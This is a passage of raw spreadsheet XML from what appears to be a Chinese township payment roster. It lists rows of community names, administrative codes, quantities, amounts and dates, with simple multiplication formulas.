      <c r="J1033" s="17">
        <v>45139</v>
      </c>
      <c r="K1033" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1034" customHeight="1" spans="1:11">
      <c r="A1034" s="16" t="s">
        <v>2749</v>
      </c>
      <c r="B1034" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1034" s="17" t="s">
        <v>2750</v>
      </c>
      <c r="D1034" s="17" t="s">
        <v>2751</v>
      </c>
      <c r="E1034" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F1034" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1034" s="17">
        <v>1</v>
      </c>
      <c r="H1034" s="18">
        <v>365</v>
      </c>
      <c r="I1034" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
      <c r="J1034" s="17">
        <v>45139</v>
      </c>
      <c r="K1034" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1035" customHeight="1" spans="1:11">
      <c r="A1035" s="16" t="s">
        <v>2752</v>
      </c>
      <c r="B1035" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1035" s="17" t="s">
        <v>2753</v>
      </c>
      <c r="D1035" s="17" t="s">
        <v>2754</v>
      </c>
      <c r="E1035" s="17" t="s">
        <v>2755</v>
      </c>
      <c r="F1035" s="17" t="s">
        <v>266</v>
      </c>
      <c r="G1035" s="17">
        <v>1</v>
      </c>
      <c r="H1035" s="18">
        <v>365</v>
      </c>
      <c r="I1035" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
      <c r="J1035" s="17">
        <v>45139</v>
      </c>
      <c r="K1035" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1036" customHeight="1" spans="1:11">
      <c r="A1036" s="16" t="s">
        <v>2756</v>
      </c>
      <c r="B1036" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1036" s="17" t="s">
        <v>2757</v>
      </c>
      <c r="D1036" s="17" t="s">
        <v>2758</v>
      </c>
      <c r="E1036" s="17" t="s">
        <v>703</v>
      </c>
      <c r="F1036" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1036" s="17">
        <v>1</v>
      </c>
      <c r="H1036" s="18">
        <v>365</v>
      </c>
      <c r="I1036" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
      <c r="J1036" s="17">
        <v>45139</v>
      </c>
      <c r="K1036" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1037" customHeight="1" spans="1:11">
      <c r="A1037" s="16" t="s">
        <v>2759</v>
      </c>
      <c r="B1037" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1037" s="17" t="s">
        <v>2760</v>
      </c>
      <c r="D1037" s="17" t="s">
        <v>2761</v>
      </c>
      <c r="E1037" s="17" t="s">
        <v>2762</v>
      </c>
      <c r="F1037" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1037" s="17">
        <v>1</v>
      </c>
      <c r="H1037" s="18">
        <v>365</v>
      </c>
      <c r="I1037" s="17">
        <f t="shared" si="51"/>
        <v>365</v>
      </c>
      <c r="J1037" s="17">
        <v>45139</v>
      </c>
      <c r="K1037" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1038" customHeight="1" spans="1:11">
      <c r="A1038" s="16" t="s">
        <v>2763</v>
      </c>
      <c r="B1038" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1038" s="17" t="s">
        <v>2764</v>
      </c>
      <c r="D1038" s="17" t="s">
        <v>2765</v>
      </c>
      <c r="E1038" s="17" t="s">
        <v>923</v>
      </c>
      <c r="F1038" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1038" s="17">
        <v>2</v>
      </c>
      <c r="H1038" s="18">
        <v>325</v>
      </c>
      <c r="I1038" s="17">
        <f t="shared" si="51"/>
        <v>650</v>
      </c>
      <c r="J1038" s="17">
        <v>45139</v>
      </c>
      <c r="K1038" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1039" customHeight="1" spans="1:11">
      <c r="A1039" s="16" t="s">
        <v>2766</v>
      </c>
      <c r="B1039" s="17" t="str">
        <f>B1038</f>
        <v>城关镇</v>
      </c>
      <c r="C1039" s="17" t="str">
        <f>C1038</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1039" s="19" t="s">
        <v>2767</v>
      </c>
      <c r="E1039" s="19" t="s">
        <v>630</v>
      </c>
      <c r="F1039" s="17" t="str">
        <f>F1038</f>
        <v>4113210108</v>
      </c>
      <c r="G1039" s="17"/>
      <c r="H1039" s="17"/>
      <c r="I1039" s="17"/>
      <c r="J1039" s="17"/>
      <c r="K1039" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1040" customHeight="1" spans="1:11">
      <c r="A1040" s="16" t="s">
        <v>2768</v>
      </c>
      <c r="B1040" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1040" s="17" t="s">
        <v>2769</v>
      </c>
      <c r="D1040" s="17" t="s">
        <v>2770</v>
      </c>
      <c r="E1040" s="17" t="s">
        <v>617</v>
      </c>
      <c r="F1040" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1040" s="17">
        <v>1</v>
      </c>
      <c r="H1040" s="18">
        <v>365</v>
      </c>
      <c r="I1040" s="17">
        <f t="shared" ref="I1040:I1048" si="52">H1040*G1040</f>
        <v>365</v>
      </c>
      <c r="J1040" s="17">
        <v>45139</v>
      </c>
      <c r="K1040" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1041" customHeight="1" spans="1:11">
      <c r="A1041" s="16" t="s">
        <v>2771</v>
      </c>
      <c r="B1041" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1041" s="17" t="s">
        <v>2772</v>
      </c>
      <c r="D1041" s="17" t="s">
        <v>2773</v>
      </c>
      <c r="E1041" s="17" t="s">
        <v>985</v>
      </c>
      <c r="F1041" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1041" s="17">
        <v>1</v>
      </c>
      <c r="H1041" s="18">
        <v>365</v>
      </c>
      <c r="I1041" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1041" s="17">
        <v>45139</v>
      </c>
      <c r="K1041" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1042" customHeight="1" spans="1:11">
      <c r="A1042" s="16" t="s">
        <v>2774</v>
      </c>
      <c r="B1042" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1042" s="17" t="s">
        <v>2775</v>
      </c>
      <c r="D1042" s="17" t="s">
        <v>2776</v>
      </c>
      <c r="E1042" s="17" t="s">
        <v>2777</v>
      </c>
      <c r="F1042" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G1042" s="17">
        <v>1</v>
      </c>
      <c r="H1042" s="18">
        <v>365</v>
      </c>
      <c r="I1042" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1042" s="17">
        <v>45139</v>
      </c>
      <c r="K1042" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1043" customHeight="1" spans="1:11">
      <c r="A1043" s="16" t="s">
        <v>2778</v>
      </c>
      <c r="B1043" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1043" s="17" t="s">
        <v>2779</v>
      </c>
      <c r="D1043" s="17" t="s">
        <v>2780</v>
      </c>
      <c r="E1043" s="17" t="s">
        <v>2781</v>
      </c>
      <c r="F1043" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1043" s="17">
        <v>1</v>
      </c>
      <c r="H1043" s="18">
        <v>365</v>
      </c>
      <c r="I1043" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1043" s="17">
        <v>45139</v>
      </c>
      <c r="K1043" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1044" customHeight="1" spans="1:11">
      <c r="A1044" s="16" t="s">
        <v>2782</v>
      </c>
      <c r="B1044" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1044" s="17" t="s">
        <v>2783</v>
      </c>
      <c r="D1044" s="17" t="s">
        <v>2784</v>
      </c>
      <c r="E1044" s="17" t="s">
        <v>2308</v>
      </c>
      <c r="F1044" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1044" s="17">
        <v>1</v>
      </c>
      <c r="H1044" s="18">
        <v>365</v>
      </c>
      <c r="I1044" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1044" s="17">
        <v>45139</v>
      </c>
      <c r="K1044" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1045" customHeight="1" spans="1:11">
      <c r="A1045" s="16" t="s">
        <v>2785</v>
      </c>
      <c r="B1045" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1045" s="17" t="s">
        <v>2786</v>
      </c>
      <c r="D1045" s="17" t="s">
        <v>2787</v>
      </c>
      <c r="E1045" s="17" t="s">
        <v>2788</v>
      </c>
      <c r="F1045" s="17" t="s">
        <v>1975</v>
      </c>
      <c r="G1045" s="17">
        <v>1</v>
      </c>
      <c r="H1045" s="18">
        <v>365</v>
      </c>
      <c r="I1045" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1045" s="17">
        <v>45139</v>
      </c>
      <c r="K1045" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1046" customHeight="1" spans="1:11">
      <c r="A1046" s="16" t="s">
        <v>2789</v>
      </c>
      <c r="B1046" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1046" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1046" s="17" t="s">
        <v>2790</v>
      </c>
      <c r="E1046" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F1046" s="17">
        <v>4113210417</v>
      </c>
      <c r="G1046" s="17">
        <v>1</v>
      </c>
      <c r="H1046" s="18">
        <v>365</v>
      </c>
      <c r="I1046" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1046" s="17">
        <v>45170</v>
      </c>
      <c r="K1046" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1047" customHeight="1" spans="1:11">
      <c r="A1047" s="16" t="s">
        <v>2791</v>
      </c>
      <c r="B1047" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1047" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1047" s="17" t="s">
        <v>2792</v>
      </c>
      <c r="E1047" s="17" t="s">
        <v>334</v>
      </c>
      <c r="F1047" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1047" s="17">
        <v>1</v>
      </c>
      <c r="H1047" s="18">
        <v>365</v>
      </c>
      <c r="I1047" s="17">
        <f t="shared" si="52"/>
        <v>365</v>
      </c>
      <c r="J1047" s="17">
        <v>45170</v>
      </c>
      <c r="K1047" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1048" customHeight="1" spans="1:11">
      <c r="A1048" s="16" t="s">
        <v>2793</v>
      </c>
      <c r="B1048" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1048" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1048" s="17" t="s">
        <v>2794</v>
      </c>
      <c r="E1048" s="17" t="s">
        <v>432</v>
      </c>
      <c r="F1048" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1048" s="17">
        <v>2</v>
      </c>
      <c r="H1048" s="18">
        <v>325</v>
      </c>
      <c r="I1048" s="17">
        <f t="shared" si="52"/>
        <v>650</v>
      </c>
      <c r="J1048" s="17">
        <v>45170</v>
      </c>
      <c r="K1048" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1049" customHeight="1" spans="1:11">
      <c r="A1049" s="16" t="s">
        <v>2795</v>
      </c>
      <c r="B1049" s="17" t="str">
        <f>B1048</f>
        <v>城关镇</v>
      </c>
      <c r="C1049" s="17" t="str">
        <f>C1048</f>
        <v>西北社区</v>
      </c>
      <c r="D1049" s="19" t="s">
        <v>2796</v>
      </c>
      <c r="E1049" s="19" t="s">
        <v>269</v>
      </c>
      <c r="F1049" s="17" t="str">
        <f>F1048</f>
        <v>4113210108</v>
      </c>
      <c r="G1049" s="17"/>
      <c r="H1049" s="17"/>
      <c r="I1049" s="17"/>
      <c r="J1049" s="17"/>
      <c r="K1049" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1050" customHeight="1" spans="1:11">
      <c r="A1050" s="16" t="s">
        <v>2797</v>
      </c>
      <c r="B1050" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1050" s="17" t="s">
        <v>2798</v>
      </c>
      <c r="D1050" s="17" t="s">
        <v>2799</v>
      </c>
      <c r="E1050" s="17" t="s">
        <v>2800</v>
      </c>
      <c r="F1050" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1050" s="17">
        <v>2</v>
      </c>
      <c r="H1050" s="18">
        <v>325</v>
      </c>
      <c r="I1050" s="17">
        <f>H1050*G1050</f>
        <v>650</v>
      </c>
      <c r="J1050" s="17">
        <v>45170</v>
      </c>
      <c r="K1050" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1051" customHeight="1" spans="1:11">
      <c r="A1051" s="16" t="s">
        <v>2801</v>
      </c>
      <c r="B1051" s="17" t="str">
        <f>B1050</f>
        <v>城关镇</v>
      </c>
      <c r="C1051" s="17" t="str">
        <f>C1050</f>
        <v>医药局西北办理</v>
      </c>
      <c r="D1051" s="19" t="s">
        <v>2802</v>
      </c>
      <c r="E1051" s="19" t="s">
        <v>2803</v>
      </c>
      <c r="F1051" s="17" t="str">
        <f>F1050</f>
        <v>4113210108</v>
      </c>
      <c r="G1051" s="17"/>
      <c r="H1051" s="17"/>
      <c r="I1051" s="17"/>
      <c r="J1051" s="17"/>
      <c r="K1051" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1052" customHeight="1" spans="1:11">
      <c r="A1052" s="16" t="s">
        <v>2804</v>
      </c>
      <c r="B1052" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1052" s="17" t="s">
        <v>2057</v>
      </c>
      <c r="D1052" s="17" t="s">
        <v>2805</v>
      </c>
      <c r="E1052" s="17" t="s">
        <v>2806</v>
      </c>
      <c r="F1052" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1052" s="17">
        <v>2</v>
      </c>
      <c r="H1052" s="18">
        <v>325</v>
      </c>
      <c r="I1052" s="17">
        <f>H1052*G1052</f>
        <v>650</v>
      </c>
      <c r="J1052" s="17">
        <v>45170</v>
      </c>
      <c r="K1052" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1053" customHeight="1" spans="1:11">
      <c r="A1053" s="16" t="s">
        <v>2807</v>
      </c>
      <c r="B1053" s="17" t="str">
        <f>B1052</f>
        <v>城关镇</v>
      </c>
      <c r="C1053" s="17" t="str">
        <f>C1052</f>
        <v>西北社区</v>
      </c>
      <c r="D1053" s="19" t="s">
        <v>2808</v>
      </c>
      <c r="E1053" s="19" t="s">
        <v>2088</v>
      </c>
      <c r="F1053" s="17" t="str">
        <f>F1052</f>
        <v>4113210108</v>
      </c>
      <c r="G1053" s="17"/>
      <c r="H1053" s="17"/>
      <c r="I1053" s="17"/>
      <c r="J1053" s="17"/>
      <c r="K1053" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1054" customHeight="1" spans="1:11">
      <c r="A1054" s="16" t="s">
        <v>2809</v>
      </c>
      <c r="B1054" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1054" s="17" t="s">
        <v>2810</v>
      </c>
      <c r="D1054" s="17" t="s">
        <v>2811</v>
      </c>
      <c r="E1054" s="17" t="s">
        <v>222</v>
      </c>
      <c r="F1054" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1054" s="17">
        <v>1</v>
      </c>
      <c r="H1054" s="18">
        <v>365</v>
      </c>
      <c r="I1054" s="17">
        <f t="shared" ref="I1054:I1060" si="53">H1054*G1054</f>
        <v>365</v>
      </c>
      <c r="J1054" s="17">
        <v>45170</v>
      </c>
      <c r="K1054" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1055" customHeight="1" spans="1:11">
      <c r="A1055" s="16" t="s">
        <v>2812</v>
      </c>
      <c r="B1055" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1055" s="17" t="s">
        <v>2813</v>
      </c>
      <c r="D1055" s="17" t="s">
        <v>2814</v>
      </c>
      <c r="E1055" s="17" t="s">
        <v>1746</v>
      </c>
      <c r="F1055" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1055" s="17">
        <v>1</v>
      </c>
      <c r="H1055" s="18">
        <v>365</v>
      </c>
      <c r="I1055" s="17">
        <f t="shared" si="53"/>
        <v>365</v>
      </c>
      <c r="J1055" s="17">
        <v>45170</v>
      </c>
      <c r="K1055" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1056" customHeight="1" spans="1:11">
      <c r="A1056" s="16" t="s">
        <v>2815</v>
      </c>
      <c r="B1056" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1056" s="17" t="s">
        <v>2769</v>
      </c>
      <c r="D1056" s="17" t="s">
        <v>2816</v>
      </c>
      <c r="E1056" s="17" t="s">
        <v>992</v>
      </c>
      <c r="F1056" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1056" s="17">
        <v>1</v>
      </c>
      <c r="H1056" s="18">
        <v>365</v>
      </c>
      <c r="I1056" s="17">
        <f t="shared" si="53"/>
        <v>365</v>
      </c>
      <c r="J1056" s="17">
        <v>45170</v>
      </c>
      <c r="K1056" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1057" customHeight="1" spans="1:11">
      <c r="A1057" s="16" t="s">
        <v>2817</v>
      </c>
      <c r="B1057" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1057" s="17" t="s">
        <v>2818</v>
      </c>
      <c r="D1057" s="17" t="s">
        <v>2819</v>
      </c>
      <c r="E1057" s="17" t="s">
        <v>1659</v>
      </c>
      <c r="F1057" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1057" s="17">
        <v>1</v>
      </c>
      <c r="H1057" s="18">
        <v>365</v>
      </c>
      <c r="I1057" s="17">
        <f t="shared" si="53"/>
        <v>365</v>
      </c>
      <c r="J1057" s="17">
        <v>45170</v>
      </c>
      <c r="K1057" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1058" customHeight="1" spans="1:11">
      <c r="A1058" s="16" t="s">
        <v>2820</v>
      </c>
      <c r="B1058" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1058" s="17" t="s">
        <v>2037</v>
      </c>
      <c r="D1058" s="17" t="s">
        <v>2821</v>
      </c>
      <c r="E1058" s="17" t="s">
        <v>499</v>
      </c>
      <c r="F1058" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1058" s="17">
        <v>1</v>
      </c>
      <c r="H1058" s="18">
        <v>365</v>
      </c>
      <c r="I1058" s="17">
        <f t="shared" si="53"/>
        <v>365</v>
      </c>
      <c r="J1058" s="17">
        <v>45170</v>
      </c>
      <c r="K1058" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1059" customHeight="1" spans="1:11">
      <c r="A1059" s="16" t="s">
        <v>2822</v>
      </c>
      <c r="B1059" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1059" s="17" t="s">
        <v>2040</v>
      </c>
      <c r="D1059" s="17" t="s">
        <v>2823</v>
      </c>
      <c r="E1059" s="17" t="s">
        <v>303</v>
      </c>
      <c r="F1059" s="17" t="s">
        <v>223</v>
      </c>
      <c r="G1059" s="17">
        <v>1</v>
      </c>
      <c r="H1059" s="18">
        <v>365</v>
      </c>
      <c r="I1059" s="17">
        <f t="shared" si="53"/>
        <v>365</v>
      </c>
      <c r="J1059" s="17">
        <v>45200</v>
      </c>
      <c r="K1059" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1060" customHeight="1" spans="1:11">
      <c r="A1060" s="16" t="s">
        <v>2824</v>
      </c>
      <c r="B1060" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1060" s="17" t="s">
        <v>2825</v>
      </c>
      <c r="D1060" s="17" t="s">
        <v>2826</v>
      </c>
      <c r="E1060" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1060" s="17" t="s">
        <v>2588</v>
      </c>
      <c r="G1060" s="17">
        <v>2</v>
      </c>
      <c r="H1060" s="18">
        <v>325</v>
      </c>
      <c r="I1060" s="17">
        <f t="shared" si="53"/>
        <v>650</v>
      </c>
      <c r="J1060" s="17">
        <v>45200</v>
      </c>
      <c r="K1060" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1061" customHeight="1" spans="1:11">
      <c r="A1061" s="16" t="s">
        <v>2827</v>
      </c>
      <c r="B1061" s="17" t="str">
        <f>B1060</f>
        <v>城关镇</v>
      </c>
      <c r="C1061" s="17" t="str">
        <f>C1060</f>
        <v>农业局（民主社区办理）</v>
      </c>
      <c r="D1061" s="19" t="s">
        <v>2828</v>
      </c>
      <c r="E1061" s="19" t="s">
        <v>2088</v>
      </c>
      <c r="F1061" s="17" t="str">
        <f>F1060</f>
        <v>4113210105</v>
      </c>
      <c r="G1061" s="17"/>
      <c r="H1061" s="17"/>
      <c r="I1061" s="17"/>
      <c r="J1061" s="17"/>
      <c r="K1061" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1062" customHeight="1" spans="1:11">
      <c r="A1062" s="16" t="s">
        <v>2829</v>
      </c>
      <c r="B1062" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1062" s="17" t="s">
        <v>2830</v>
      </c>
      <c r="D1062" s="17" t="s">
        <v>2831</v>
      </c>
      <c r="E1062" s="17" t="s">
        <v>236</v>
      </c>
      <c r="F1062" s="17">
        <v>4113210104</v>
      </c>
      <c r="G1062" s="17">
        <v>1</v>
      </c>
      <c r="H1062" s="18">
        <v>365</v>
      </c>
      <c r="I1062" s="17">
        <f>H1062*G1062</f>
        <v>365</v>
      </c>
      <c r="J1062" s="17">
        <v>45200</v>
      </c>
      <c r="K1062" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1063" customHeight="1" spans="1:11">
      <c r="A1063" s="16" t="s">
        <v>2832</v>
      </c>
      <c r="B1063" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1063" s="17" t="s">
        <v>2833</v>
      </c>
      <c r="D1063" s="17" t="s">
        <v>1047</v>
      </c>
      <c r="E1063" s="17" t="s">
        <v>2834</v>
      </c>
      <c r="F1063" s="17">
        <v>4113210104</v>
      </c>
      <c r="G1063" s="17">
        <v>1</v>
      </c>
      <c r="H1063" s="18">
        <v>365</v>
      </c>
      <c r="I1063" s="17">
        <f>H1063*G1063</f>
        <v>365</v>
      </c>
      <c r="J1063" s="17">
        <v>45200</v>
      </c>
      <c r="K1063" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1064" customHeight="1" spans="1:11">
      <c r="A1064" s="16" t="s">
        <v>2835</v>
      </c>
      <c r="B1064" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1064" s="17" t="s">
        <v>2833</v>
      </c>
      <c r="D1064" s="17" t="s">
        <v>2836</v>
      </c>
      <c r="E1064" s="17" t="s">
        <v>435</v>
      </c>
      <c r="F1064" s="17">
        <v>4113210104</v>
      </c>
      <c r="G1064" s="17">
        <v>2</v>
      </c>
      <c r="H1064" s="18">
        <v>325</v>
      </c>
      <c r="I1064" s="17">
        <f>H1064*G1064</f>
        <v>650</v>
      </c>
      <c r="J1064" s="17">
        <v>45200</v>
      </c>
      <c r="K1064" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1065" customHeight="1" spans="1:11">
      <c r="A1065" s="16" t="s">
        <v>2837</v>
      </c>
      <c r="B1065" s="17" t="str">
        <f>B1064</f>
        <v>城关镇</v>
      </c>
      <c r="C1065" s="17" t="str">
        <f>C1064</f>
        <v>二建（南外社区办理）</v>
      </c>
      <c r="D1065" s="19" t="s">
        <v>2838</v>
      </c>
      <c r="E1065" s="19" t="s">
        <v>2839</v>
      </c>
      <c r="F1065" s="17">
        <f>F1064</f>
        <v>4113210104</v>
      </c>
      <c r="G1065" s="17"/>
      <c r="H1065" s="17"/>
      <c r="I1065" s="17"/>
      <c r="J1065" s="17"/>
      <c r="K1065" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1066" customHeight="1" spans="1:11">
      <c r="A1066" s="16" t="s">
        <v>2840</v>
      </c>
      <c r="B1066" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1066" s="17" t="s">
        <v>2841</v>
      </c>
      <c r="D1066" s="17" t="s">
        <v>2842</v>
      </c>
      <c r="E1066" s="17" t="s">
        <v>2843</v>
      </c>
      <c r="F1066" s="17">
        <v>4113210108</v>
      </c>
      <c r="G1066" s="17">
        <v>1</v>
      </c>
      <c r="H1066" s="18">
        <v>365</v>
      </c>
      <c r="I1066" s="17">
        <f>H1066*G1066</f>
        <v>365</v>
      </c>
      <c r="J1066" s="17">
        <v>45200</v>
      </c>
      <c r="K1066" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1067" customHeight="1" spans="1:11">
      <c r="A1067" s="16" t="s">
        <v>2844</v>
      </c>
      <c r="B1067" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1067" s="17" t="s">
        <v>2845</v>
      </c>
      <c r="D1067" s="17" t="s">
        <v>2846</v>
      </c>
      <c r="E1067" s="17" t="s">
        <v>1066</v>
      </c>
      <c r="F1067" s="17">
        <v>4113210106</v>
      </c>
      <c r="G1067" s="17">
        <v>1</v>
      </c>
      <c r="H1067" s="18">
        <v>365</v>
      </c>
      <c r="I1067" s="17">
        <f>H1067*G1067</f>
        <v>365</v>
      </c>
      <c r="J1067" s="17">
        <v>45200</v>
      </c>
      <c r="K1067" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1068" customHeight="1" spans="1:11">
      <c r="A1068" s="16" t="s">
        <v>2847</v>
      </c>
      <c r="B1068" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1068" s="17" t="s">
        <v>2848</v>
      </c>
      <c r="D1068" s="17" t="s">
        <v>2849</v>
      </c>
      <c r="E1068" s="17" t="s">
        <v>2850</v>
      </c>
      <c r="F1068" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1068" s="17">
        <v>1</v>
      </c>
      <c r="H1068" s="18">
        <v>365</v>
      </c>
      <c r="I1068" s="17">
        <f>H1068*G1068</f>
        <v>365</v>
      </c>
      <c r="J1068" s="17">
        <v>45231</v>
      </c>
      <c r="K1068" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1069" customHeight="1" spans="1:11">
      <c r="A1069" s="16" t="s">
        <v>2851</v>
      </c>
      <c r="B1069" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1069" s="17" t="s">
        <v>2818</v>
      </c>
      <c r="D1069" s="17" t="s">
        <v>2852</v>
      </c>
      <c r="E1069" s="17" t="s">
        <v>323</v>
      </c>
      <c r="F1069" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1069" s="17">
        <v>1</v>
      </c>
      <c r="H1069" s="18">
        <v>365</v>
      </c>
      <c r="I1069" s="17">
        <f>H1069*G1069</f>
        <v>365</v>
      </c>
      <c r="J1069" s="17">
        <v>45231</v>
      </c>
      <c r="K1069" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1070" customHeight="1" spans="1:11">
      <c r="A1070" s="16" t="s">
        <v>2853</v>
      </c>
      <c r="B1070" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1070" s="17" t="s">
        <v>2764</v>
      </c>
      <c r="D1070" s="17" t="s">
        <v>2854</v>
      </c>
      <c r="E1070" s="17" t="s">
        <v>320</v>
      </c>
      <c r="F1070" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1070" s="17">
        <v>2</v>
      </c>
      <c r="H1070" s="18">
        <v>325</v>
      </c>
      <c r="I1070" s="17">
        <f>H1070*G1070</f>
        <v>650</v>
      </c>
      <c r="J1070" s="17">
        <v>45231</v>
      </c>
      <c r="K1070" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1071" customHeight="1" spans="1:11">
      <c r="A1071" s="16" t="s">
        <v>2855</v>
      </c>
      <c r="B1071" s="17" t="str">
        <f>B1070</f>
        <v>城关镇</v>
      </c>
      <c r="C1071" s="17" t="str">
        <f>C1070</f>
        <v>外贸局中华办理</v>
      </c>
      <c r="D1071" s="19" t="s">
        <v>2856</v>
      </c>
      <c r="E1071" s="19" t="s">
        <v>2857</v>
      </c>
      <c r="F1071" s="17" t="str">
        <f>F1070</f>
        <v>4113210108</v>
      </c>
      <c r="G1071" s="17"/>
      <c r="H1071" s="17"/>
      <c r="I1071" s="17"/>
      <c r="J1071" s="17"/>
      <c r="K1071" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1072" customHeight="1" spans="1:11">
      <c r="A1072" s="16" t="s">
        <v>2858</v>
      </c>
      <c r="B1072" s="17" t="s">
        <v>219</v>
      </c>
      <c r="C1072" s="17" t="s">
        <v>2859</v>
      </c>
      <c r="D1072" s="17" t="s">
        <v>2860</v>
      </c>
      <c r="E1072" s="17" t="s">
        <v>2861</v>
      </c>
      <c r="F1072" s="17" t="s">
        <v>233</v>
      </c>
      <c r="G1072" s="17">
        <v>2</v>
      </c>
      <c r="H1072" s="18">
        <v>375</v>
      </c>
      <c r="I1072" s="17">
        <f>H1072*G1072</f>
        <v>750</v>
      </c>
      <c r="J1072" s="17">
        <v>45231</v>
      </c>
      <c r="K1072" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="1073" customHeight="1" spans="1:11">
      <c r="A1073" s="16" t="s">
        <v>2862</v>
      </c>
      <c r="B1073" s="17" t="str">
